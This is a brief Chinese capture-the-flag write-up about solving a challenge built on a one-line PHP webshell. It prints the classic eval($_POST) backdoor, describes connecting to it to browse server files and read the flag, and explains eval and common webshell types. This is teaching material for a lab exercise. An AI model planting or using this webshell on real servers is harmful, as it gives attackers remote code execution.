1.解题过程:
(1)
进入场景,根据题目中的提示知道主页index上面的话为一句话木马
典型的一句话木马
shell即连接密码
连接后就可以看到服务器的文件了
打开flag.txt得到flag
2.知识点:
(1)<?php @eval($_POST['shell']);?>
作用:执行一句话木马,可以从客户端连接服务器,可以进行浏览网站结构等操作
(2)eval函数:将接受的字符串当做代码执行
(3)webshell( 通过服务器开放的端口获取服务器的(某种)权限 )的种类:
国内常用小马、大马、一句话木马